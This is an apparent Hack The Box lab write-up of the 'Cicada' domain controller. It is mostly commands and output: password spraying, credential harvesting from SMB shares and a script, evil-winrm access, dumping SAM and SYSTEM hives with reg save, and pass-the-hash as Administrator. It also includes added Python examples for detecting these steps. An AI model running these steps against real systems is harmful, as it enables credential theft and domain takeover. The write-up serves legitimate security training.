HTB Cicada machine notes

2025/1/16 5:51:27 / Source: https://www.cnblogs.com/LINGX5/p/18518267

Cicada machine notes

Overview

The HTB machine Cicada

Machine URL: https://app.hackthebox.com/machines/Cicada

An interesting and easy Windows machine. It relies on information enumeration several times, with each newly found piece of information leading one step closer to root privileges.

I. nmap scan

1) Port scan

-sT: TCP connect scan; --min-rate 10000: send packets at no less than 10000 per second; -p-: scan all 65535 ports

nmap -sT -p- --min-rate 10000 -o ports 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.39s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
54435/tcp open  unknown

Extract the open ports into a comma-separated list:

ports=$(grep open ports | awk -F/ '{print $1}' | paste -sd ,)


2) Service and version detection

-sT: TCP connect scan; -sV: probe service versions on the open ports; -sC: run the default script set; -O: OS detection

nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o details 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 15:06:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
54435/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-09-29T15:08:00
|_  start_date: N/A

3) Vulnerability script scan

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o vuln 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

II. SMB enumeration

1) smbclient

The target exposes SMB on port 445, so first try anonymous access:

smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

With an empty password, the share list is disclosed to us.

Only the HR share is accessible, so let's look inside for anything interesting:

smbclient  '\\10.10.11.35\HR'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 424297 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 

There is a file named Notice from HR.txt.

View its contents:

cat Notice\ from\ HR.txt 
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

It reads like an onboarding email, and it hands us a default password: Cicada$M6Corpb*@Lp#nZp!8

We don't know the username yet, so we use crackmapexec to enumerate the machine's users.

2) crackmapexec

a) Enumerate usernames

crackmapexec smb 10.10.11.35 -u 'dsad' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\dsad:
SMB         10.10.11.35     445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Filtering the SidTypeUser entries out of the result gives the machine's user accounts:

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
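The list above picked up "Domain" and "Protected" because a grep for "user" also matches the group names "Domain Users" and "Protected Users". The following parser, an added example rather than code from the original write-up, keys on the SidType tag instead; it runs over a constructed excerpt of the --rid-brute output and also separates machine accounts (trailing $) from human ones:

```python
import re

# Constructed excerpt of crackmapexec --rid-brute output (not the full listing);
# each line ends in "<RID>: <DOMAIN>\<name> (<SidType>)".
SAMPLE_RID_OUTPUT = """\
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)
"""

# Names may contain spaces ("Domain Users"), so anchor on the "(SidType...)" suffix
# instead of splitting on whitespace, which is what produced "Domain" and "Protected".
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)


def parse_rid_brute(text):
    """Return (rid, domain, name, sidtype) for every line that carries a RID entry."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            entries.append((int(m.group("rid")), m.group("domain"),
                            m.group("name"), m.group("type")))
    return entries


def user_accounts(text, include_machine=False):
    """Names tagged SidTypeUser; machine accounts (name ends in '$') are left out
    unless include_machine is set, so the inventory lists only human accounts."""
    names = []
    for _rid, _domain, name, sidtype in parse_rid_brute(text):
        if sidtype != "SidTypeUser":
            continue
        if name.endswith("$") and not include_machine:
            continue
        names.append(name)
    return names
```

For a defender, the same parser answers the question the write-up raises implicitly: exactly which account names an unauthenticated guest session can read off the domain controller.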

b) Test the credential

Put the usernames in a file named user and the password in a file named pass:

crackmapexec smb 10.10.11.35  -u user -p pass --continue-on-success


We get a valid SMB credential: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Check its share permissions:

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --shares


A new share, DEV, shows up, but this account has no READ permission on it.

This account also cannot log in over WinRM.


c) Further enumeration

Use the known account to enumerate information about the other accounts:

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --users


Another credential is disclosed: david.orelious:aRt$Lp#7t*VQ!3

Check his SMB permissions:

crackmapexec smb 10.10.11.35  -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares


This user has read access to the DEV share.

Use smbclient to fetch its contents:

smbclient  '\\10.10.11.35\DEV' -U david.orelious   
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 423385 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> 

The share holds Backup_script.ps1; after downloading it, view it:

cat Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Yet another credential is hardcoded in the script: emily.oscars:Q!3@Lp#M6b*7t*Vt
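The backup script leaks its credential through ConvertTo-SecureString -AsPlainText on a string literal. As an added example (not code from the write-up or the target), the scanner below flags that pattern, plus a quoted literal assigned to a $password-style variable, in PowerShell scripts found on a share; the sample scripts and the file name backup.cred are constructed, and the secret in the sample is a placeholder:

```python
import re

# Constructed sample mirroring the pattern in Backup_script.ps1 (placeholder secret).
SAMPLE_PS1 = r'''
$username = "svc_backup"
$password = ConvertTo-SecureString "PLACEHOLDER-password" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
'''

# Clean variant: the secret is read from a DPAPI-protected exported SecureString
# (assumed file name) instead of being written into the script.
SAMPLE_PS1_CLEAN = r'''
$password = Get-Content .\backup.cred | ConvertTo-SecureString
$credentials = New-Object System.Management.Automation.PSCredential("svc_backup", $password)
'''

# PowerShell is case-insensitive, so both rules use re.I.
FINDINGS = [
    ("plaintext-securestring",
     re.compile(r"ConvertTo-SecureString\s+([\"'])(?P<secret>.*?)\1[^\n]*-AsPlainText", re.I)),
    ("literal-password-variable",
     re.compile(r"\$(?:password|passwd|pass|pwd)\s*=\s*([\"'])(?P<secret>.*?)\1", re.I)),
]


def find_hardcoded_credentials(script_text):
    """Return (line_number, rule_name, masked_secret) for each hit.
    Only the first two characters of the secret are kept so the report itself
    does not become a second copy of the credential."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for rule, pattern in FINDINGS:
            m = pattern.search(line)
            if m:
                secret = m.group("secret")
                masked = secret[:2] + "*" * max(len(secret) - 2, 0)
                hits.append((lineno, rule, masked))
    return hits
```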

Verify WinRM access:

crackmapexec winrm 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'


The status is Pwn3d!, which means this account can log in over WinRM.

III. Foothold

1) evil-winrm

evil-winrm -i 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'


We get the user flag.

IV. Privilege escalation

Check the current user's privileges:

whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The current user holds SeBackupPrivilege and SeRestorePrivilege. With those we can dump the SAM and SYSTEM hives, extract the Administrator NTLM hash from them, and then pass the hash (PTH) to obtain Administrator privileges.

Create a temp directory under C:\ and run:

reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
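From the blue-team side, the two commands above are what a process-creation log records. The following is an added detection example (not part of the write-up) that flags exports of the SAM, SYSTEM or SECURITY hives in command lines; the event records are constructed, and the field names user and cmd are assumed stand-ins for the account and CommandLine fields of a Sysmon Event ID 1 or Security 4688 event:

```python
import re

# Constructed process-creation records; not telemetry from the actual box.
SAMPLE_EVENTS = [
    {"user": "CICADA\\emily.oscars", "cmd": r"reg save hklm\sam c:\temp\sam"},
    {"user": "CICADA\\emily.oscars", "cmd": r"reg  save HKLM\SYSTEM c:\temp\system"},
    {"user": "NT AUTHORITY\\SYSTEM",
     "cmd": r"C:\Windows\system32\reg.exe SAVE HKEY_LOCAL_MACHINE\SECURITY C:\Windows\Temp\sec.hiv"},
    {"user": "CICADA\\emily.oscars", "cmd": r"reg query hklm\software\microsoft\windows\currentversion\run"},
    {"user": "CICADA\\emily.oscars", "cmd": r"reg save hklm\software\contoso c:\temp\app.hiv"},
]

# "reg[.exe] save|export" followed by a credential-bearing hive, in either the
# short (HKLM) or long (HKEY_LOCAL_MACHINE) form, case-insensitive, with an
# optional quote before the key and any run of whitespace between tokens.
HIVE_DUMP = re.compile(
    r"(?:^|[\\\s])reg(?:\.exe)?\s+(?:save|export)\s+"
    r"[\"']?(?:hklm|hkey_local_machine)\\(?P<hive>sam|system|security)\b",
    re.I,
)


def is_hive_dump(cmdline):
    """True when the command line exports SAM, SYSTEM or SECURITY."""
    return HIVE_DUMP.search(cmdline) is not None


def hive_dump_alerts(events):
    """Return (user, hive) per matching event. A non-SYSTEM account exporting
    these hives is exactly the SeBackupPrivilege pattern used above, and the
    SAM/SYSTEM pair from one account within minutes is the strongest signal."""
    alerts = []
    for ev in events:
        m = HIVE_DUMP.search(ev["cmd"])
        if m:
            alerts.append((ev["user"], m.group("hive").upper()))
    return alerts
```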


The dumped sam and system hives are now in C:\temp.

download sam
download system

Download both files to the local machine.


Extract the hashes from the SAM:

impacket-secretsdump -sam sam -system system local


The Administrator NTLM hash is 2b87e7c93a3e8a0ea4a581937016f341.

Now pass the hash (a PTH attack):

evil-winrm -i 10.10.11.35  -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341


Root privileges obtained.

Summary

The nmap scan showed SMB open on port 445. Enumerating SMB disclosed a user password, which led to a set of credentials usable for WinRM remote management. After logging in, the user turned out to hold SeBackupPrivilege; that privilege was used to dump the hives and extract the hash, and a PTH attack then gave administrator privileges.
